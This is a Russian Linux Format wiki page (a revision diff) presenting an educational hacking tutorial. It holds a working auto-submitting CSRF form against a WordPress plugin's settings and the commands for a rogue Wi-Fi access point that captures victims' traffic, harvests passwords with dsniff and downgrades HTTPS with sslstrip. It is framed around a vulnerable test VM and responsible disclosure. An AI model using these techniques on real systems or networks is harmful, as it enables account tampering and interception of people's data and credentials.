Журнал LinuxFormat - перейти на главную

LXF170:Взлом сети

Материал из Linuxformat
(Различия между версиями)
Перейти к: навигация, поиск
(За­щи­ти­те се­бя)
(За­щи­ти­те се­бя)
 
Строка 49: Строка 49:
  
 
Ес­ли вы ис­поль­зуе­те спе­циа­ли­зи­ро­ван­ное web-при­ло­жение, вы долж­ны быть уве­ре­ны, что вам зна­ко­мы раз­ные тех­но­ло­гии, ис­поль­зуе­мые ата­кую­щи­ми. От­лич­ный стар­то­вый пункт – сайт OWASP (Open Source Web Applications Security Project – Про­ект безо­пас­но­сти web-при­ло­жений с от­кры­тым ко­дом), https://www.owasp.org. Ес­ли на ва­шем сай­те хра­нят­ся важ­ные дан­ные, сто­ит по­со­ве­то­вать­ся со спе­циа­ли­стом по по­во­ду обес­пе­чения безо­пас­но­сти их хранения.
 
Ес­ли вы ис­поль­зуе­те спе­циа­ли­зи­ро­ван­ное web-при­ло­жение, вы долж­ны быть уве­ре­ны, что вам зна­ко­мы раз­ные тех­но­ло­гии, ис­поль­зуе­мые ата­кую­щи­ми. От­лич­ный стар­то­вый пункт – сайт OWASP (Open Source Web Applications Security Project – Про­ект безо­пас­но­сти web-при­ло­жений с от­кры­тым ко­дом), https://www.owasp.org. Ес­ли на ва­шем сай­те хра­нят­ся важ­ные дан­ные, сто­ит по­со­ве­то­вать­ся со спе­циа­ли­стом по по­во­ду обес­пе­чения безо­пас­но­сти их хранения.
 +
{{Врезка|left|Ширина=98%|Заголовок= Шаг за ша­гом: На­страи­ва­ем сре­ду|Содержание='''1 Им­порт ВМ>'''
 +
 +
Щелкните (м. б. два­ж­ды) по Linux Format Vulnerable Machine.ova, за­тем щелкните по Import в диа­ло­го­вом окне.
 +
 +
'''2 За­пуск ВМ>'''
 +
 +
Два­ж­ды щелкните по но­вой ма­шине, что­бы за­пустить ее. По­сле за­груз­ки она вы­даст го­лу­бой эк­ран с раз­ны­ми URL.
 +
 +
'''3 Про­смотр сай­та'''
 +
 +
За­пусти­те web-брау­зер (дол­жен ра­бо­тать лю­бой) и ука­жи­те ему верхний URL из пре­ды­ду­ще­го ша­га. }}
 +
 +
===По­иск уяз­ви­мо­стей===
 +
 +
''Как об­на­ру­жить и ис­поль­зо­вать сла­бую сто­ро­ну ва­ше­го сай­та.''
 +
 +
Взгля­нув на ВМ LXF Vulnerable Machine, вы мо­же­те лег­ко прий­ти к вы­во­ду, что ис­поль­зо­вать уяз­ви­мо­сти очень лег­ко, зная, где они есть, а вот как их най­ти? Что­бы от­ве­тить на этот во­прос, мы по­ста­ви­ли се­бе за­да­чу най­ти и ис­поль­зо­вать уяз­ви­мо­сти на на­шем сай­те.
 +
 +
Во-пер­вых, мы уста­но­ви­ли ата­кую­щий про­кси. Этот ин­ст­ру­мент пе­ре­хва­ты­ва­ет HTTP-за­про­сы ва­ше­го брау­зе­ра и ис­поль­зу­ет их для соз­дания кар­ты сай­та, ко­то­рый вы про­смат­ри­вае­те. С его по­мо­щью вы мо­же­те по­нять, что же имен­но вы ата­куе­те, да­же ес­ли у вас нет досту­па к ис­ход­но­му ко­ду. Так­же он да­ет вам пред­став­ление об ин­фор­ма­ции, пе­ре­да­вае­мой ме­ж­ду сер­ве­ром и брау­зе­ром.
 +
 +
Мы вы­бра­ли OWASP ZAP (он име­ет­ся на http://code.google.com/p/zaproxy и на DVD) – что­бы при­менить его, про­сто рас­па­куй­те его и за­пусти­те (уста­нав­ли­вать не на­до) с по­мо­щью:
 +
 +
tar zxvf ZAP_2.0.0_Linux.tar.gz
 +
 +
cd ZAP_2.0.0
 +
 +
./zap.sh
 +
 +
Вер­сии 2.0.0 тре­бу­ет­ся Java 1.7 или вы­ше. Ес­ли у вас бо­лее ран­няя вер­сия (как по умол­чанию в Ubuntu 12.04), вы мо­же­те ис­поль­зо­вать или ZAP вер­сии 1.4.1, или са­мо­стоя­тель­но най­ти вер­сию Java по­но­вее. На на­шей ма­шине с Precise Pangolin мы уста­но­ви­ли па­кет openjdk-7-jre и из­менили конеч­ную стро­ку с zap.sh на
 +
 +
exec /usr/lib/jvm/java-7-openjdk-i386/bin/java ${JMEM}-XX:PermSize=256M -jar “{BASEDIR}/zap.jar” org.zaproxy.zap.ZAP $*
 +
 +
Эта ко­ман­да за­пустит ра­бо­ту про­кси на пор­те 8080, и вам нуж­но на­стро­ить свой брау­зер, что­бы он про­пускал свои дан­ные че­рез него. В Firefox это де­ла­ет­ся в Edit > Preferences, за­тем на­до пе­рей­ти в Advanced > Network > Settings и из­менить пе­ре­клю­ча­тель на Manual Proxy Configuration с HTTP Proxy в ка­че­­ст­ве localhost и Port 8080.
 +
 +
Те­перь вы долж­ны уви­деть од­ну или несколь­ко за­пи­сей Zap для ка­ж­дой страницы, на ко­то­рую вы за­хо­ди­те. Zap так­же по­пы­та­ет­ся по­мочь вам, от­ме­чая все пунк­ты, ко­то­рые он со­чтет уяз­ви­мы­ми, цвет­ным флаж­ком – от жел­то­го до крас­но­го, в за­ви­си­мо­сти от серь­ез­но­сти про­бле­мы (по его мнению). Флаж­ки го­лу­бо­го цве­та про­сто от­ме­ча­ют ин­фор­ма­цию. Од­на­ко эту гра­да­цию на­до принимать не без скеп­си­са. Мно­гие из от­ме­чен­ных флаж­ка­ми страниц во­все не яв­ля­ют­ся уяз­ви­мы­ми, а мно­гие, на­обо­рот, про­пуска­ют­ся (это обыч­ная про­бле­ма со все­ми ав­то­ма­ти­че­­ски­­ми сканера­ми безо­пас­но­сти, ко­то­рые мы встре­ча­ли).
 +
 +
На­стро­ив про­грам­му, мы мо­жем на­чать ата­ку. Пер­вая фа­за лю­бо­го тес­та на проник­но­вение – это сбор ин­фор­ма­ции. В ZAP есть ин­ст­ру­мен­ты для ав­то­ма­ти­че­­ско­­го сканиро­вания сай­та, но мы пред­по­чи­та­ем на­чать с руч­но­го сканиро­вания. Это оз­на­ча­ет про­смотр сай­та че­рез ваш web-брау­зер, в про­цес­се ко­то­ро­го ZAP со­став­ля­ет ка­та­лог. Чем под­робнее вы рас­смат­ри­вае­те сайт, тем боль­ше ин­фор­ма­ции вы по­лу­чи­те.
 +
 +
Про­дви­га­ясь по при­ло­жению, мы ищем век­то­ры ата­ки. В основ­ном это спо­соб пе­ре­да­чи ин­фор­ма­ции на сайт. В HTTP это про­ис­хо­дит в двух ви­дах: па­ра­мет­ры, пе­ре­да­вае­мые по за­про­сам GET (это би­ты, ко­то­рые сле­ду­ют за во­про­си­тель­ным зна­ком в URL), и за­про­сы POST (их труднее уви­деть без та­ко­го про­кси, как ZAP, но они пе­ре­чис­ле­ны во вклад­ке Requests). Лю­бые их них мож­но из­менить так, что­бы они от­прав­ля­ли лю­бую нуж­ную нам ин­фор­ма­цию. Как вы ви­ди­те на при­ме­ре атак на блог WordPress, хо­ро­шо про­ду­ман­ные и ор­ганизо­ван­ные вре­до­носные дан­ные мо­гут иногда про­скольз­нуть на сайт, ес­ли он не про­ве­ря­ет вхо­дя­щие дан­ные долж­ным об­ра­зом.
 +
 +
По­лу­чив пол­ное пред­став­ление о сво­ей жерт­ве, мож­но при­сту­пать к по­ис­ку мес­та для на­шей ата­ки. Да­же на та­ком про­стом сай­те WordPress, как наш, есть сотни век­то­ров, ко­то­рые мы мо­жем рас­смот­реть, но боль­шин­ст­во не бу­дут уяз­ви­мы. Ча­стью ис­кусст­ва взло­ма сай­тов яв­ля­ет­ся осоз­нание то­го, на ка­ких век­то­рах сто­ит скон­цен­три­ро­вать­ся. На­при­мер, мож­но бы по­про­бо­вать ата­ко­вать па­ра­метр page_id, имею­щий­ся на боль­шин­ст­ве страниц, но на WordPress он на­столь­ко ва­жен, что явно под­вер­гал­ся тща­тельней­ше­му рас­смот­рению. Мо­жет, он и уяз­вим, но ско­рее все­го сла­дить с ним не так-то про­сто. Луч­ше по­ис­кать сла­бо­сти в менее ис­поль­зуе­мых об­лас­тях. Ис­то­ри­че­­ски сло­жи­лось, что до­полнения всегда бы­ли ку­да бо­лее пло­до­твор­ной поч­вой для ата­кую­ще­го, чем основ­ное при­ло­жение.
 +
 +
===Под­дел­ка меж­сай­то­вых за­про­сов===
 +
 +
Мы об­ра­ти­ли внимание, что ZAP пе­ре­чис­лил ряд страниц, уяз­ви­мых для под­дел­ки меж­сай­то­вых за­про­сов (Cross Site Request Forgery, CSRF), во вклад­ке Alerts. Это спо­соб ата­ки, при ко­то­ром вы об­ман­ным пу­тем за­став­ляе­те web-при­ло­жение при­нять вхо­дя­щие дан­ные, соз­да­вая дру­гой сайт, ко­то­рый ими­ти­ру­ет HTTP-за­прос web-при­ло­жения. Ес­ли по­сле это­го ау­тен­ти­фи­ци­ро­ван­ный поль­зо­ва­тель от­кро­ет ваш вре­до­носный сайт, его брау­зер от­пра­вит его ау­тен­ти­фи­ка­ци­он­ные cookie, бла­го­да­ря ко­то­рым ваш вре­до­носный за­прос HTTP бу­дет вы­полнен поль­зо­ва­те­лем (не пе­ре­жи­вай­те, ес­ли это все по­ка­за­лось вам тем­ным: все станет яс­но по ме­ре то­го, как мы бу­дем раз­би­рать суть ата­ки).
 +
 +
Обыч­но WordPress оста­нав­ли­ва­ет этот вид ата­ки с по­мо­щью “nonce”. Это слу­чай­ным об­ра­зом вы­бран­ное чис­ло, на­прав­ляе­мое в брау­зер при соз­дании фор­мы. Ес­ли с дан­ны­ми фор­мы на­зад на сер­вер пе­ре­да­ет­ся то же чис­ло, сер­вер зна­ет, что фор­ма пред­став­ле­на поль­зо­ва­те­лем на сай­те. Ес­ли нет – сер­вер понима­ет, что фор­ма пред­став­ле­на дру­гим сай­том, и про­сто сбра­сы­ва­ет дан­ные. Од­на­ко мы за­ме­ти­ли, что на од­ной из страниц нет nonce – в про­стом за­про­се HTTP POST, раз­ре­шен­ном с по­мо­щью cookie. А зна­чит, лю­бая фор­ма HTML (неза­ви­си­мо от то­го, на ка­ком сай­те она бы­ла) мо­жет пред­ста­вить дан­ные этой час­ти при­ло­жения. Вы­гля­де­ло иде­аль­ной це­лью для CSRF-ата­ки. Об­су­ж­дае­мая страница бы­ла на­строй­ка­ми для Ungallery (за­прос см. на рис. 1).
 +
 +
Хит­рость те­перь за­клю­ча­лась в соз­дании но­вой страницы, ко­то­рая бы генери­ро­ва­ла иден­тич­ный за­прос HTTP. Это был за­прос POST, и имен­но его про­ще все­го под­де­лать с по­мо­щью фор­мы HTML. Мы соз­да­ли но­вый файл, со­дер­жа­щий сле­дую­щее:
 +
 +
<html>
 +
 +
<head>
 +
 +
<title>Test site for csrf in Ungallery</title>
 +
 +
</head>
 +
 +
<body>
 +
 +
<form action=”http://site-url/wp-admin/options-general.php?page=ungallerysettings” method=”POST”>
 +
 +
<input type=”hidden” name=”mt_submit_hidden” value=”Y”>
 +
 +
<input type=”hidden” name=”images_path” value=”%2Froot%2Fimages%2F”>
 +
 +
<input type=”hidden” name=”URI” value=”http%3A%2F%2F 192.168.133.143%2F”>
 +
 +
<input type=”hidden” name=”gallery” value=”%3Fpage_id%3D9”>
 +
 +
<input type=”hidden” name=”cache_dir” value=”%2Fvar%2F www%2Fwordpress%2Fwp-content%2Fcache%2F”>
 +
 +
<input type=”hidden” name=”columns” value=”5”>
 +
 +
<input type=”hidden” name=”thumbnail” value=”190”>
 +
 +
<input type=”hidden” name=”browse_view” value=”440”>
 +
 +
<input type=”hidden” name=”hidden” value=”hidden”>
 +
 +
<input type=”hidden” name=”gallery2” value=””>
 +
 +
<input type=”hidden” name=”images2_path” value=””>
 +
 +
<input type=”hidden” name=”gallery3” value=””>
 +
 +
<input type=”hidden” name=”images3_path” value=””>
 +
 +
<input type=”hidden” name=”gallery4” value=””>
 +
 +
<input type=”hidden” name=”images4_path” value=””>
 +
 +
<input type=”hidden” name=”gallery5” value=””>
 +
 +
<input type=”hidden” name=”images5_path” value=””>
 +
 +
<input type=”hidden” name=”gallery6” value=””>
 +
 +
<input type=”hidden” name=”images6_path” value=””>
 +
 +
<input type=”hidden” name=”Submit” value=”Save+Changes”>
 +
 +
</form>
 +
 +
<script>document.forms[0].submit();</script>
 +
 +
</body>
 +
 +
</head>
 +
 +
Как вы мо­же­те ви­деть, это но­вая фор­ма HTML, ко­то­рая пред­став­ля­ет дан­ные на страницу на­стро­ек Ungallery. По­сколь­ку здесь нет nonce, Ungallery ав­то­ма­ти­че­­ски при­мет его, ес­ли бу­дет иметь со­от­вет­ст­вую­щий cookie. Ес­ли нек­то с пра­ва­ми ад­минист­ра­то­ра от­кро­ет файл, он мо­жет из­менить на­строй­ки. При на­стоя­щей ата­ке это мож­но сде­лать, от­пра­вив по элек­трон­ной поч­те зав­ле­ка­тель­ную ссыл­ку ад­минист­ра­то­ру или оста­вив где-нибудь в об­ще­ст­вен­ном мес­те флэш­ку USB со скрип­том autorun. Конеч­но, это не са­мая вре­до­носная ата­ка, но ею мож­но восполь­зо­вать­ся, что­бы сде­лать от­кры­ты­ми изо­бра­жения, ко­то­рые долж­ны бы­ли хранит­ся в сек­ре­те.
 +
 +
Ис­то­рия на этом, конеч­но же, не за­кан­чи­ва­ет­ся. Мы в Linux Format при­дер­жи­ва­ем­ся по­ли­ти­ки от­вет­ст­вен­но­го раз­гла­шения. Это оз­на­ча­ет, что хо­тя мы и ра­ды пуб­ли­ко­вать под­роб­ную ин­фор­ма­цию об уяз­ви­мо­стях, все же сна­ча­ла мы обя­за­тель­но из­ве­ща­ем раз­ра­бот­чи­ка.
 +
 +
Как ви­ди­те, про­цесс об­на­ру­жения уяз­ви­мо­стей тре­бу­ет знания то­го, что имен­но ис­кать, и на­хо­ж­дения при­ло­жений для это­го. Это мо­жет быть дол­гий и мед­лен­ный про­цесс. Есть ав­то­ма­ти­че­­ские сканеры (вро­де то­го, что вклю­чен в ZAP), но все же на­мно­го луч­ше де­лать это вруч­ную – так виднее, что про­ис­хо­дит. Мно­гие тес­ти­ров­щи­ки на проник­но­вение пред­по­чи­та­ют руч­ную ра­бо­ту, это по­зво­ля­ет им до­би­вать­ся ку­да луч­ших ре­зуль­та­тов, чем ав­то­ма­ти­че­ским сканерам.
 +
 +
===По­сред­ник===
 +
 +
''Как под­верг­нуть ата­ке от­дель­ный web-брау­зер.''
 +
 +
По­ка мы рас­смот­ре­ли толь­ко ата­ку на сайт, но это лишь по­ло­ви­на ис­то­рии. Мы мо­жем так­же под­верг­нуть ата­ке че­ло­ве­ка, ко­то­рый на­хо­дит­ся в се­ти. Одним из спо­со­бов сде­лать это яв­ля­ет­ся XSS (на­при­мер, тот, что воз­мо­жен в ВМ WordPress), но мы сей­час скон­цен­три­ру­ем­ся на хи­щении дан­ных.
 +
 +
Для это­го есть несколь­ко спо­со­бов. На­при­мер, мож­но уста­но­вить на ком­пь­ю­тер вре­до­носное ПО и ис­поль­зо­вать его для пе­ре­хва­та се­те­во­го тра­фи­ка. Од­на­ко в на­шей ста­тье мы восполь­зу­ем­ся про­стей­шим спо­со­бом: раз­мес­тим вре­до­носный ком­пь­ю­тер ме­ж­ду жерт­вой и Ин­тернетом, что­бы весь тра­фик шел че­рез него. Это на­зы­ва­ет­ся ата­кой ти­па «По­средник» (Man In The Middle, MITM). Мо­же­те со­вер­шить ее с по­мо­щью се­те­вых ка­бе­лей, мо­же­те да­же вир­ту­аль­но со­вер­шить ее с по­мо­щью ата­ки ARP-spoofing; ну, а мы об­ра­тим­ся к Wi-Fi.
 +
 +
Как и все ата­ки, опи­сан­ные в этой ста­тье, зло­упот­реб­ление дан­ной ата­кой яв­ля­ет­ся неза­кон­ным в боль­шин­ст­ве стран. Это не оз­на­ча­ет зло­упот­реб­ление дан­ны­ми, это оз­на­ча­ет кра­жу дан­ных как та­ко­вую.
 +
 +
Что­бы про­тес­ти­ро­вать ата­ку, мы взя­ли нетбук, под­клю­чен­ный к Ethernet, для соз­дания бес­про­вод­ной точ­ки досту­па – лю­ди поль­зу­ют­ся та­ки­ми для со­единения с се­тью в ка­фе, да­же не за­ду­мы­ва­ясь о безопасности.
 +
 +
Во-пер­вых, нуж­на про­грам­ма на­строй­ки точ­ки досту­па. Мы ис­поль­зо­ва­ли hostapd. Она име­ет­ся в ре­по­зи­то­ри­ях неко­то­рых ди­ст­ри­бу­ти­вов, и доступ­на на http://hostap.epitest.fi/hostapd/. Вам так­же по­на­до­бит­ся DHCP-сер­вер – он по­зво­лит убе­дить­ся, что кли­ен­ты, со­единен­ные с ва­шей точ­кой досту­па, мо­гут по­лу­чить IP-ад­ре­са. Мы ис­поль­зо­ва­ли dhcpd3 (из па­ке­та dhcpd3-server в Ubuntu).
 +
 +
Обе­им про­грам­мам нуж­ны фай­лы на­строй­ки. Фай­лы для при­ме­ра вы най­де­те в tar-ар­хи­ве ко­да он­лайн на www.linuxformat.com/archive.
 +
 +
Ус­та­но­вив про­грам­му и най­дя файл на­строй­ки, на­строй­те свою точ­ку досту­па с по­мо­щью
 +
 +
sudo hostapd –Bdd hostapdl.conf
 +
 +
sudo dhcpd -4 –cf dhcp2.conf wlan0
 +
 +
Воз­мож­но, при­дет­ся до­ба­вить путь к двум фай­лам .conf, ес­ли их нет в те­ку­щей ди­рек­то­рии.
 +
 +
Вам нуж­но ве­леть сво­ей ма­шине пе­ре­на­пра­вить ин­тернет-
 +
со­единения на дру­гое се­те­вое со­единение; в про­тив­ном слу­чае лю­бая ма­ши­на, ко­то­рая со­еди­ня­ет­ся с ва­ми, не смо­жет по­лу­чить доступ к Ин­тернет.
 +
 +
sudo bash
 +
 +
echo “1” >/proc/sys/net/ipv4/ip_froward
 +
 +
iptables –t nat –A POSTROUTING –o eth0 –j MASQUERADE
 +
 +
Ве­ро­ят­но, са­мое уди­ви­тель­ное в Ин­тернете то, что боль­шая часть ин­фор­ма­ции не шиф­ру­ет­ся. Она про­сто от­прав­ля­ет­ся как обыч­ный текст, ко­то­рый мо­жет про­чи­тать лю­бой MITM без вся­ких про­блем со взло­мом шиф­ра.
 +
 +
Wireshark – от­лич­ный ин­ст­ру­мент для про­смот­ра дан­ных, про­хо­дя­щих че­рез ваш вре­до­носный ком­пь­ю­тер на уровне па­ке­тов, но боль­шую часть вре­мени нам не нуж­но уг­луб­лять­ся до это­го уров­ня. Вме­сто это­го мож­но ис­поль­зо­вать justniffer для воссоз­дания все­го се­те­во­го тра­фи­ка, про­хо­дя­ще­го че­рез на­шу вре­до­носную точ­ку досту­па.
 +
 +
Обыч­но этот ин­ст­ру­мент не вклю­ча­ет­ся в ре­по­зи­то­рии ди­ст­ри­бу­ти­вов. Что­бы уста­но­вить его в Ubuntu, до­бавь­те PPA:
 +
 +
sudo add-apt-repository ppa:oreste-notelli/ppa
 +
 +
sudo apt-get update
 +
 +
sudo apr-get install justniffer
 +
 +
В дру­гих ди­ст­ри­бу­ти­вах при­дет­ся ком­пи­ли­ро­вать его са­мо­стоя­тель­но. Под­роб­но­сти см. на http://justniffer.sourceforge.net/#!/install
 +
 +
Есть ряд оп­ций, по­зво­ляю­щих вы­пол­нять са­мые раз­ные ви­ды се­те­во­го монито­рин­га. Мы со­би­ра­ем­ся ис­поль­зо­вать его спо­соб­ность воссоз­да­вать web-страницы, ко­то­рые он ви­дит. Сна­ча­ла соз­дай­те ди­рек­то­рию дан­ных. В дан­ном при­ме­ре она бу­дет в до­машней ди­рек­то­рии ав­то­ра, но мо­жет на­хо­дить­ся где угод­но (непло­хо раз­мес­тить ее на от­дель­ном дис­ке, ес­ли вы планируе­те оста­вить ее ра­бо­тать на неко­то­рое вре­мя).
 +
 +
mkdir /home/ben/data
 +
 +
sudo justniffer-grab-http-traffic -d /home/ben/data -U ben -i wlan0
 +
 +
В обо­их стро­ках нуж­но за­менить ben на свое имя поль­зо­ва­те­ля. Оп­ция -U ко­ман­ду­ет, под ка­ким поль­зо­ва­те­лем со­хра­нять фай­лы.
 +
 +
Ес­ли вы со­единились с точ­кой досту­па че­рез ком­пь­ю­тер, план­шет или те­ле­фон и бро­ди­те по се­ти, вы долж­ны ви­деть ди­рек­то­рию дан­ных, за­пол­няе­мую фай­ла­ми для ка­ж­дой про­смот­рен­ной неза­шиф­ро­ван­ной страницы. Сю­да вхо­дит со­дер­жание всех про­чи­тан­ных пи­сем, пе­ре­дан­ных без ис­поль­зо­вания HTTPS (Gmail ис­поль­зу­ет его, и по­это­му пись­ма с него не бу­дут про­чи­та­ны; а боль­шин­ст­во осталь­ных сай­тов– нет).
 +
 +
Конеч­но, не все, что вы хо­ти­те пе­ре­хва­тить, про­хо­дит че­рез HTTP, и мно­гие дру­гие по­пу­ляр­ные про­то­ко­лы тоже не за­шиф­ро­ва­ны (на­при­мер, FTP и Telnet). На ваше сча­стье, есть и ин­ст­ру­менты, спо­соб­ные по­мочь вам ата­ко­вать их. На­при­мер, dsniff (http://monkey.org/~dugsong/dsniff) вы­та­щит из се­те­во­го тра­фи­ка все неза­шиф­ро­ван­ные па­ро­ли.
 +
 +
Оба эти ин­ст­ру­мен­та пас­сив­ны, то есть про­сто де­ла­ют ко­пии дан­ных, никак ина­че на них не воз­дей­ст­вуя. Мы мо­жем несколь­ко из­менить си­туа­цию, но для это­го при­дет­ся при­бег­нуть к ак­тив­ной ата­ке, в ча­ст­но­сти, к sslstrip.
 +
 +
sslstrip ис­поль­зу­ет са­му суть се­те­вых ссы­лок и тот факт, что неко­то­рые страницы за­шиф­ро­ва­ны, а неко­то­рые – нет. В основ­ном он от­сле­жи­ва­ет весь неза­шиф­ро­ван­ный тра­фик и ждет ссыл­ки или пе­ре­ад­ре­са­ции на сай­ты HTTPS, а за­тем на­чи­на­ет ата­ку MITM: sslstrip за­пра­ши­ва­ет безо­пас­ную вер­сию сай­та и вы­да­ет ее брау­зе­ру в ви­де про­сто­го HTTP.
 +
 +
Сайт мо­жет за­бло­ки­ро­вать по­доб­ную ата­ку, од­на­ко в це­ли на­шей ста­тьи не вхо­дит рас­смот­рение это­го про­цес­са. Од­на­ко мы об­на­ру­жи­ли, что неко­то­рые по­пу­ляр­ные сай­ты (вклю­чая Facebook и Yahoo) ока­за­лись уяз­ви­мы. Мы со­об­щи­ли об этой про­бле­ме ко­ман­дам безо­пас­но­сти этих сай­тов. Facebook нам от­ве­тил, что они ре­ко­мен­ду­ют вклю­чить на­строй­ки безо­пас­но­сти брау­зе­ра. Од­на­ко оста­но­вить ата­ку им не уда­ст­ся, и когда мы со­об­щи­ли об этом, нам ниче­го не от­ве­ти­ли. А от Yahoo от­ве­та во­об­ще не поступи­ло.
 +
 +
===Шиф­руй­тесь===
 +
 +
Вы мо­же­те рас­смат­ри­вать Ин­тернет как сво­его ро­да поч­то­вый сер­вис. Обыч­но дан­ные пе­ре­да­ют­ся неза­шиф­ро­ван­ны­ми, и это по­хо­же на пе­ре­сыл­ку от­крыт­ки. Про­чи­тать ее мо­жет мно­же­ст­во лю­дей, с мо­мен­та от­прав­ки и до мо­мен­та достав­ки, и то же мож­но ска­зать и об ин­фор­ма­ции, от­прав­ляе­мой че­рез HTTP, FTP, Telnet. Иногда это не име­ет зна­чения – вам, ве­ро­ят­но, на­пле­вать, ес­ли поч­таль­он ва­шей ба­буш­ки уз­на­ет, что над всей Ис­панией без­об­лач­ное небо – но иногда и важ­но; и вы вряд ли за­хо­ти­те, что­бы поч­таль­он уз­нал ва­ши бан­ков­ские ре­к­ви­зи­ты. То же са­мое мож­но ска­зать и о дан­ных он­лайн. Ес­ли вы не хо­ти­те, что­бы ва­ши дан­ные бы­ли доступ­ны для ши­ро­кой пуб­ли­ки, ис­поль­зуй­те за­шиф­ро­ван­ный про­то­кол (HTTPS, SFTP, SSH, SCP и т. п.).
 +
 +
Что­бы несколь­ко уп­ро­стить эту за­да­чу, Electronic Frontier Foundation (EFF) соз­да­ли рас­ши­рение для Firefox (вер­сия для Chrome на­хо­дит­ся на аль­фа-ста­дии раз­ра­бот­ки) под на­званием HTTPS Everywhere. Оно обес­пе­чи­ва­ет ис­поль­зо­вание по умол­чанию за­шиф­ро­ван­ной вер­сии сай­та, ес­ли та­ко­вая су­ще­ст­вует. Ес­ли у сай­та нет за­шиф­ро­ван­ной вер­сии, то оно бу­дет ра­бо­тать с неза­шиф­ро­ван­ной, так что бди­тель­ность те­рять все рав­но не советуем.
 +
 +
Как мы ви­де­ли бла­го­да­ря sslstrip, нуж­но быть крайне осто­рож­ным при ис­поль­зо­вании от­кры­той се­ти, да­же ес­ли сайт за­шиф­ро­ван. Пре­ж­де чем вво­дить ка­кую-ли­бо ин­фор­ма­цию, убе­ди­тесь, что вы ис­поль­зуе­те HTTPS.
 +
 +
За­шиф­ро­ван­ные про­то­ко­лы со­хра­ня­ют кон­фи­ден­ци­аль­ность дан­ных, но они не скры­ва­ют, ка­кие сер­ве­ры вы ис­поль­зуе­те. На­при­мер, зло­умыш­ленник мо­жет уз­нать, что вы ис­поль­зуе­те gmail.com, но не смо­жет уз­нать, под ка­ким именем поль­зо­ва­те­ля вы ра­бо­тае­те или ка­кие со­об­щения по элек­трон­ной поч­те по­лу­чае­те или от­прав­ляе­те. Ес­ли по­ми­мо шиф­ро­вания вам нуж­на и аноним­ность, поль­зуй­тесь VPN или Tor (https://www.torproject.org/). Помните, что для обес­пе­чения долж­ной за­щи­ты и в этом случае все рав­но на­до ис­поль­зо­вать про­то­кол с шиф­ро­ванием.
 +
 +
> sstrtip со­хра­ня­ет ко­пию все­го неза­шиф­ро­ван­но­го тра­фи­ка. Обычная ко­ман­да grep мо­жет най­ти лю­бые дан­ные иден­ти­фи­ка­ции (не радуйтесь: это не на­стоя­щие учет­ные за­пи­си).
 +
 +
{{Врезка|left|Ширина=98%|Заголовок= Взлом сер­ти­фи­ка­тов |Содержание=Все ви­ды шиф­ро­вания осно­ва­ны на ис­поль­зо­вании клю­чей. Это нечто вро­де па­ро­лей, по­зво­ляю­щих рас­шиф­ро­вать до­ку­мент. Всегда нуж­но обес­пе­чить обе сто­ро­ны необ­хо­ди­мы­ми клю­ча­ми, что­бы рас­шиф­ро­вать ин­фор­ма­цию. В се­ти ис­поль­зу­ют­ся се­ти­фи­ка­ты. Эти сер­ти­фи­ка­ты соз­да­ют­ся удо­сто­ве­ряю­щи­ми цен­тра­ми, и га­ран­ти­ру­ют, что по­лу­чае­мые дан­ные (и ис­поль­зуе­мые клю­чи) дей­ст­ви­тель­но пе­ре­да­ны с за­яв­лен­но­го сай­та. Про­цесс сер­ти­фи­ка­ции сай­тов от­крыт для на­па­дения. На­при­мер, ес­ли вы мо­же­те за­гру­зить в брау­зер сер­ти­фи­кат соб­ст­вен­но­го удо­сто­ве­ряю­ще­го цен­тра, вы за­тем смо­же­те соз­дать соб­ст­вен­ные под­дель­ные сер­ти­фи­ка­ты, ко­то­рым брау­зер бу­дет до­ве­рять. Сде­лав это, вы за­тем смо­же­те ор­ганизо­вать ата­ку «По­средника», ис­поль­зуя под­дель­ный сер­ти­фи­кат.
 +
 +
Что­бы по­мочь тес­ти­ров­щи­кам взло­ма с шиф­ро­ван­ны­ми сай­та­ми, ZAP уме­ет соз­да­вать та­кие удо­сто­ве­ряю­щие цен­тры и за­пускать ата­ки с их по­мо­щью. Есть так­же ряд ком­мер­че­­ских про­кси, соз­дан­ных, что­бы де­лать это ши­ро­ко­мас­штаб­но, что­бы (на­при­мер) ком­пании мог­ли уз­навать, чем их со­трудники занима­ются он­лайн.
 +
 +
Вы­вод та­кой: ес­ли кто-то еще кон­тро­ли­ру­ет ваш ком­пь­ю­тер, он мо­жет сле­дить за всем, что вы от­прав­ляе­те по се­ти, неза­ви­си­мо от шиф­ро­вания HTTPS.
 +
}}
 +
===DDoS===
 +
 +
''Со­кру­ши­те на­ме­чен­ный сер­вер.''
 +
 +
Distributed Denial of Service (DDoS), ве­ро­ят­но, са­мый раз­рек­ла­ми­ро­ван­ный вид ата­ки за по­следнее вре­мя. Anoni­mous и про­чие ха­кер­ст­вую­щие кол­лек­ти­вы при­бе­га­ли к нему для атак на пра­ви­тель­ст­ва, фи­нан­со­вые уч­ре­ж­дения и про­чие ор­ганиза­ции, ко­то­рые в чем-то им на­со­ли­ли. Хоть это и не так рек­ла­ми­ро­ва­лось, но DOS так­же стал ору­жи­ем, ко­то­рое ис­поль­зо­ва­ли кри­ми­наль­ные эле­мен­ты. Од­на­ко пре­ж­де чем го­во­рить о при­чи­нах это­го, да­вай­те рас­смот­рим, что та­кое DDoS-ата­ки и как они ра­бо­та­ют.
 +
 +
В об­щих чер­тах, DDoS-ата­ка не по­зво­ля­ет сер­ве­ру вы­пол­нять свои обыч­ные функ­ции, от­ка­зы­вая та­ким об­ра­зом поль­зо­ва­те­лям в об­слу­жи­вании. Обыч­но это web-сер­вер, но необя­за­тель­но. Это де­ла­ет­ся не по­сред­ст­вом взло­ма ком­пь­ю­те­ра или по­лу­чения досту­па, а пе­ре­груз­кой сер­ве­ра боль­шим по­то­ком за­про­сов.
 +
 +
На­при­мер, ата­кую­щий мо­жет пе­ре­гру­зить се­те­вое со­единение сер­ве­ра фик­тив­ны­ми дан­ны­ми, и ника­кие полезные па­ке­ты про­скольз­нуть не смо­гут, или он мо­жет за­хва­тить все цик­лы CPU, и сер­вер не смо­жет об­ра­ба­ты­вать дру­гие за­про­сы.
 +
 +
